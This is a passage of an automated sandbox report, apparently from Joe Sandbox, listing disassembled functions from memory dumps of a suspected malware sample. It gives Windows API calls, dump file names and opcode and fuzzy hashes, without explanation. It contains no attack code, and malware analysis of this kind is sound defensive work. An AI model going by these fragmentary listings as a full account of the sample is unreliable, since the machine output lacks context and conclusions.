                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                    • String ID: SysAnimate32
                                    • API String ID: 4146253029-1011021900
                                    • Opcode ID: 0023c4bf8abc2cf9545722ec002fbe6bec0a740d72a41003177b1b4a428152e1
                                    • Instruction ID: 2a16ccfab4210ba2a3b7e2a05f4d5328a3d77432846187d832057a08c45280f7
                                    • Opcode Fuzzy Hash: 0023c4bf8abc2cf9545722ec002fbe6bec0a740d72a41003177b1b4a428152e1
                                    • Instruction Fuzzy Hash: C421A47120428ABBEF218FA6DC84FBB77ADFF99364F100618F91492190C772DC42A760
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 009C9588
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009C95B9
                                    • GetStdHandle.KERNEL32(0000000C), ref: 009C95CB
                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009C9605
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: dc75d67f00d2e3a20cb3430b185e5f71054e9aec5843c05073debe7e5950b799
                                    • Instruction ID: feb62f8babcfe1a3d0dbb06ab212f26700117e313bcf3e3c4f995e7e1c273be6
                                    • Opcode Fuzzy Hash: dc75d67f00d2e3a20cb3430b185e5f71054e9aec5843c05073debe7e5950b799
                                    • Instruction Fuzzy Hash: F0215171900249ABEB21AF69DC09F9A77E8AF89724F204A1DFDA1D72D0D770D942CB11
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 009C9653
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009C9683
                                    • GetStdHandle.KERNEL32(000000F6), ref: 009C9694
                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009C96CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: 271ef5ad392d20f6b12c6fc3f2e3a72a5459ab17e323cfd77cde94441712b3e6
                                    • Instruction ID: 9870036bc950161b89c69216ea27fdf083ee5691a1c0bd16f8e476188c7dc1ca
                                    • Opcode Fuzzy Hash: 271ef5ad392d20f6b12c6fc3f2e3a72a5459ab17e323cfd77cde94441712b3e6
                                    • Instruction Fuzzy Hash: E4215371D002059BDB209F699D49F9AB7ECAF95734F200A1DF8A1D72D0D770D942CB52
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 009CDB0A
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009CDB5E
                                    • __swprintf.LIBCMT ref: 009CDB77
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00A1DC00), ref: 009CDBB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume__swprintf
                                    • String ID: %lu
                                    • API String ID: 3164766367-685833217
                                    • Opcode ID: e41b8a13d9031bf158da785abf0b38543cd33bd9f84098290912d401965c9d80
                                    • Instruction ID: 1e040e915f589b73e7c5c4a1cfdea6e723b9fffac5eac91022cedbb5b628065f
                                    • Opcode Fuzzy Hash: e41b8a13d9031bf158da785abf0b38543cd33bd9f84098290912d401965c9d80
                                    • Instruction Fuzzy Hash: 26215375A00108AFCB10EFA5CD85EEEBBB8EF89704B104069F509D7351DB71EA41CB61
                                    APIs
                                      • Part of subcall function 009BC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009BC84A
                                      • Part of subcall function 009BC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009BC85D
                                      • Part of subcall function 009BC82D: GetCurrentThreadId.KERNEL32 ref: 009BC864
                                      • Part of subcall function 009BC82D: AttachThreadInput.USER32(00000000), ref: 009BC86B
                                    • GetFocus.USER32 ref: 009BCA05
                                      • Part of subcall function 009BC876: GetParent.USER32(?), ref: 009BC884
                                    • GetClassNameW.USER32(?,?,00000100), ref: 009BCA4E
                                    • EnumChildWindows.USER32(?,009BCAC4), ref: 009BCA76
                                    • __swprintf.LIBCMT ref: 009BCA90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                    • String ID: %s%d
                                    • API String ID: 3187004680-1110647743
                                    • Opcode ID: 671086def58174e445845a9b2f3e4f4766cdc0c3364c940e79097bb85facae13
                                    • Instruction ID: 4500958e826c662154741745d07cee27d9a1ea8fad191c5ebb08bcaf282dfc5e
                                    • Opcode Fuzzy Hash: 671086def58174e445845a9b2f3e4f4766cdc0c3364c940e79097bb85facae13
                                    • Instruction Fuzzy Hash: 291193B56002097BCF11FFA08D85FEA3B7DAF84724F008466FE08AA182DB709546DB70
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009E19F3
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 009E1A26
                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 009E1B49
                                    • CloseHandle.KERNEL32(?), ref: 009E1BBF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                    • String ID:
                                    • API String ID: 2364364464-0
                                    • Opcode ID: bef4c3d35702a298af4be6f2f49df4ef1cacaa860770b55c5a492108c858a98c
                                    • Instruction ID: 7cc95a040f29188889a63b682c097a109ee32ec306ef2e15587752cf3141fc97
                                    • Opcode Fuzzy Hash: bef4c3d35702a298af4be6f2f49df4ef1cacaa860770b55c5a492108c858a98c
                                    • Instruction Fuzzy Hash: 2E818371600205ABDF11EF65C886BADBBE5BF48720F148459F905AF382D7B4ED418B90
                                    APIs
                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 009EE1D5
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 009EE20D
                                    • IsDlgButtonChecked.USER32(?,00000001), ref: 009EE248
                                    • GetWindowLongW.USER32(?,000000EC), ref: 009EE269
                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009EE281
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$ButtonCheckedLongWindow
                                    • String ID:
                                    • API String ID: 3188977179-0
                                    • Opcode ID: 0f4ecbe36feb3a23ffd0363321b8619f62b170f1c3ccdeb0ba854e7f112355e3
                                    • Instruction ID: d5529e703e8525c5a1bd3707950c7c539b8b3c4bfa8f38185e21b568bc7d14eb
                                    • Opcode Fuzzy Hash: 0f4ecbe36feb3a23ffd0363321b8619f62b170f1c3ccdeb0ba854e7f112355e3
                                    • Instruction Fuzzy Hash: 4661B538A08284AFDB22DF55CC94FAAB7BEEF89300F044059F959973A1C775AD81CB11
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 009C1CB4
                                    • VariantClear.OLEAUT32(00000013), ref: 009C1D26
                                    • VariantClear.OLEAUT32(00000000), ref: 009C1D81
                                    • VariantClear.OLEAUT32(?), ref: 009C1DF8
                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009C1E26
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Variant$Clear$ChangeInitType
                                    • String ID:
                                    • API String ID: 4136290138-0
                                    • Opcode ID: d2af43232513f971be8c6ecc12a32d49f7cf7bf301128baf258d68dfc91f609e
                                    • Instruction ID: ea84f6df51e11a806963327a80d8e5e1a54b8f2869d33551fd063c020ba45a75
                                    • Opcode Fuzzy Hash: d2af43232513f971be8c6ecc12a32d49f7cf7bf301128baf258d68dfc91f609e
                                    • Instruction Fuzzy Hash: C55149B5A00209EFDB14CF58C880EAAB7B8FF4D314B158559E95ADB341D330EA52CFA5
                                    APIs
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009E06EE
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 009E077D
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009E079B
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 009E07E1
                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 009E07FB
                                      • Part of subcall function 0099E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,009CA574,?,?,00000000,00000008), ref: 0099E675
                                      • Part of subcall function 0099E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,009CA574,?,?,00000000,00000008), ref: 0099E699
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                    • String ID:
                                    • API String ID: 327935632-0
                                    • Opcode ID: 585277d7ffb14e53e83d403635b6b833e0f53f452524a4880e7aa2ed608fabc2
                                    • Instruction ID: 7ada7dd49eaf98b4d75661e7a3adadcfdf3cb313813a53b905267eb826c5b7d3
                                    • Opcode Fuzzy Hash: 585277d7ffb14e53e83d403635b6b833e0f53f452524a4880e7aa2ed608fabc2
                                    • Instruction Fuzzy Hash: 52514B75A00249DFCB01EFA8C885EADB7B5BF98310F04805AE915AB352DB75ED46CF90
                                    APIs
                                      • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E2EEF
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009E2F2E
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 009E2F75
                                    • RegCloseKey.ADVAPI32(?,?), ref: 009E2FA1
                                    • RegCloseKey.ADVAPI32(00000000), ref: 009E2FAE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                    • String ID:
                                    • API String ID: 3740051246-0
                                    • Opcode ID: 8517052be045454cc5d1a7f35271f98e45e9f89ca4fe5afee5680bb55a50a45b
                                    • Instruction ID: b75f208ed463a3d5a14d4805f7dc4c259ac06b9de190efe0b53643e3e64b8aec
                                    • Opcode Fuzzy Hash: 8517052be045454cc5d1a7f35271f98e45e9f89ca4fe5afee5680bb55a50a45b
                                    • Instruction Fuzzy Hash: D3515972608244AFD705EFA5C891F6ABBF8BF88304F04881DF59697291DB70ED05CB52
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 216ae4503c445e081f5097d13f7258f4c21c1b126f4b8fbd18a0eb4e6a99748f
                                    • Instruction ID: f41ef6cbb15d18cd0266bc830c61e1e262a8dc5aa5144f4e5e22b06930931c0f
                                    • Opcode Fuzzy Hash: 216ae4503c445e081f5097d13f7258f4c21c1b126f4b8fbd18a0eb4e6a99748f
                                    • Instruction Fuzzy Hash: E041D6BA900288ABC712DBA9CC44FA9BB6DEB09310F150125F999A72D1C735AD93D650
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009D12B4
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009D12DD
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009D131C
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009D1341
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009D1349
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                    • String ID:
                                    • API String ID: 1389676194-0
                                    • Opcode ID: 92e8e25c122fb6311153ef8a5dfb7505a391679b782925f7b648e39687998d07
                                    • Instruction ID: f12d4596195c992b312c1df55a5801760007c0e724cb4dc6041b06f42d1e778d
                                    • Opcode Fuzzy Hash: 92e8e25c122fb6311153ef8a5dfb7505a391679b782925f7b648e39687998d07
                                    • Instruction Fuzzy Hash: DE411E35A00105EFDF05EF64C991AADBBF5FF48314B148099E90AAB3A2DB31ED01DB51
                                    APIs
                                    • GetCursorPos.USER32(000000FF), ref: 0099B64F
                                    • ScreenToClient.USER32(00000000,000000FF), ref: 0099B66C
                                    • GetAsyncKeyState.USER32(00000001), ref: 0099B691
                                    • GetAsyncKeyState.USER32(00000002), ref: 0099B69F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: c3f83baa425fc5d3c1fd0071dcd2ba5e6f58fea82763d92784e97f9bef5f08a1
                                    • Instruction ID: f6a7a8fafbd93550d49abd26436b8ce96c3df173ec389a75aa85611e7e7daf48
                                    • Opcode Fuzzy Hash: c3f83baa425fc5d3c1fd0071dcd2ba5e6f58fea82763d92784e97f9bef5f08a1
                                    • Instruction Fuzzy Hash: 5F418E31508119FBDF159FA8C944EE9BBB9FB45324F10431AF829962D0CB35AD90DFA1
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 009BB369
                                    • PostMessageW.USER32(?,00000201,00000001), ref: 009BB413
                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 009BB41B
                                    • PostMessageW.USER32(?,00000202,00000000), ref: 009BB429
                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 009BB431
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    • Opcode ID: c41c07be420c8253010ed0729c3b87f91299e488829f603d815e21105ef03955
                                    • Instruction ID: 025e88641fb9610e96f29031e6e064ee322349f2ac1b8cfce7f659cc080a8dd9
                                    • Opcode Fuzzy Hash: c41c07be420c8253010ed0729c3b87f91299e488829f603d815e21105ef03955
                                    • Instruction Fuzzy Hash: 36319F7290021DEBDB04CFA8DE8DADE7BB6FB04325F104229F925A71D1C7B09955CB90
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 009BDBD7
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009BDBF4
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009BDC2C
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009BDC52
                                    • _wcsstr.LIBCMT ref: 009BDC5C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                    • String ID:
                                    • API String ID: 3902887630-0
                                    • Opcode ID: a886fe5fc44b61f89386637e18e2951cb70d5d567e0912dd5bb53ff21af25230
                                    • Instruction ID: 4bcacdbdd1604d1510fb95b35f347c23df98bff4d84b27765bbb3e378516c885
                                    • Opcode Fuzzy Hash: a886fe5fc44b61f89386637e18e2951cb70d5d567e0912dd5bb53ff21af25230
                                    • Instruction Fuzzy Hash: AF212972205104BBEB159F799D49EBB7FACDF85770F108039F809CA191FAA1CC42D2A0
                                    APIs
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009BBC90
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009BBCC2
                                    • __itow.LIBCMT ref: 009BBCDA
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009BBD00
                                    • __itow.LIBCMT ref: 009BBD11
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$__itow
                                    • String ID:
                                    • API String ID: 3379773720-0
                                    • Opcode ID: ee7f9490c51df64721c1d28a7c1b7a41e139390b039bc0bfe0111d4af6c2d76e
                                    • Instruction ID: d6d32cd225202b5a698eb260678cb495c334d442a4fe10cf93310dd899c08739
                                    • Opcode Fuzzy Hash: ee7f9490c51df64721c1d28a7c1b7a41e139390b039bc0bfe0111d4af6c2d76e
                                    • Instruction Fuzzy Hash: 1621C9756002187FDB10AEA98D85FDE7E6DAFC9720F001424F945EB1C1DBA4C94587A1
                                    APIs
                                      • Part of subcall function 009850E6: _wcsncpy.LIBCMT ref: 009850FA
                                    • GetFileAttributesW.KERNEL32(?,?,?,?,009C60C3), ref: 009C6369
                                    • GetLastError.KERNEL32(?,?,?,009C60C3), ref: 009C6374
                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009C60C3), ref: 009C6388
                                    • _wcsrchr.LIBCMT ref: 009C63AA
                                      • Part of subcall function 009C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009C60C3), ref: 009C63E0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                    • String ID:
                                    • API String ID: 3633006590-0
                                    • Opcode ID: 7c5e685efc3dfff854ac5bbe1a1a8c698449567d525b21a76f615b2b41a28027
                                    • Instruction ID: cacf813f4bfd606e86c5cdef541253b5b8062dc7a82173b70f0aa8cdb3754b0f
                                    • Opcode Fuzzy Hash: 7c5e685efc3dfff854ac5bbe1a1a8c698449567d525b21a76f615b2b41a28027
